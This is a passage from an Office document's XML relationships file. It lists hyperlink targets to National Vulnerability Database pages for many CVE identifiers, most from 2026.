Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87911" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-30156" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21441" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44432" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5598" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-52251" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16745" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18341" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18486" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18617" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19298" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19633" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27606" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32590" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33001" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39944" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40858" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43112" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44829" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48054" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49050" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49255" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49467" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50191" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51974" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52691" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53071" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53277" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53322" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54099" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55485" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55509" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55521" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55585" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55676" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57163" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57866" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62316" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64364" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69857" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70178" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71808" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72883" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73222" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73667" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73841" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75624" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75777" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76059" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78569" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78571" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78575" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79742" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80914" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80921" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81211" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81550" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81551" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81554" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81940" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81941" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 